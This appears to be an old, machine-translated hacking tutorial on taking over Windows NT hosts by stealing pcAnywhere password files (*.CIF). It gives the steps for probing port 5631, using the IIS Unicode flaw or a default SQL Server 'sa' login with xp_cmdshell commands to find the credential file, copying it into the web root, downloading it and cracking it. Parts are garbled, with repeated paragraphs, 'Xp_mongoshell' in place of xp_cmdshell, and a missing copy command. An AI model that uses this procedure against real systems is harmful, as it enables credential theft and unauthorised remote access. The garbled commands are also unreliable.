Comments: NT machines generally use PCAnyWhere for remote management. Win2K machines generally use terminals for remote management. Therefore, if you can obtain the account and password for remote connection to PCAnyWhere, then you can remotely connect to the host. The key to the problem is to obtain the PCAnyWhere password file (*. CIF), and then use the PCanyWhere password viewing tool. Because NT machines generally use PCAnyWhere for remote management, Win2K machines generally use terminals for remote management, therefore, if you can obtain the PCAnyWhere remote connection account and password, you can remotely connect to the host.
The key to the problem is to obtain the PCAnyWhere password file (*. CIF), and then use the PCanyWhere password viewing tool.
Http://www.csdn.net/soft/openfile.asp? Kind = 2 & id = 7824) to get the account and password.
The PCAnyWhere Server uses port 5631. You can use:
Telnet 10.10.10.10 5631
Determine whether the remote host's PCAnyWhere Server is enabled.
The following two methods are used to obtain the PCAnyWhere password file:
Method 1: Use the Unicode vulnerability PCanyWhere password viewing tool
The following uses the Unicode tool to demonstrate how to use the Unicode vulnerability to obtain the PCAnyWhere password file (*. CIF ).
Download tool:
Pcanywhere9.2: http://www.symantec.com/
The downloaded Pcanywhere9.2 has a validity period,
The procedure is as follows:
Find the *. CIF file on the host.
Copy the file to the website directory.
Use IE to download the file.
Use PcanywherePWD to obtain the user name and password.
Connect to log on.
Procedure:
Find the *. CIF file on the host
Run the dir c:/*. cif/s command:
Generally, Citempl. cif is the default password file. Therefore, we need the SA. CIF file.
Copy the file to the website directory.
To find the file: Use the command
Dir c:/Tscontent.gif/s
After you know the directory, for example, c:/inetpub/wwwroot/
Directory of the password file: c:/Program Files/pcANYWHERE/DATA
Run the Copy command below:
1 file (s) copied indicates that the copy is successful.
Use IE to download this file
Use http: // 1.1.1.1/sa. cif to download the file.
Use the PCanyWhere password viewing tool to get the user name and password
Remote connection
Method 2: Use SQLServer PCanyWhere password to view the tool
Because the Sa password of some websites is generally null or Sa, it may be the same as the domain name. If you remotely connect to the database of the host, you can also obtain the password file:
The method is as follows:
Use: XP_Cmdshell 'dir c:/*. cif/s'
Find the password file and copy it to the website directory:
Xp_mongoshell 'Copy c:/pcanywhere/sa. cif
C:/inetpub/wwwroot'
Download and get the user name and password.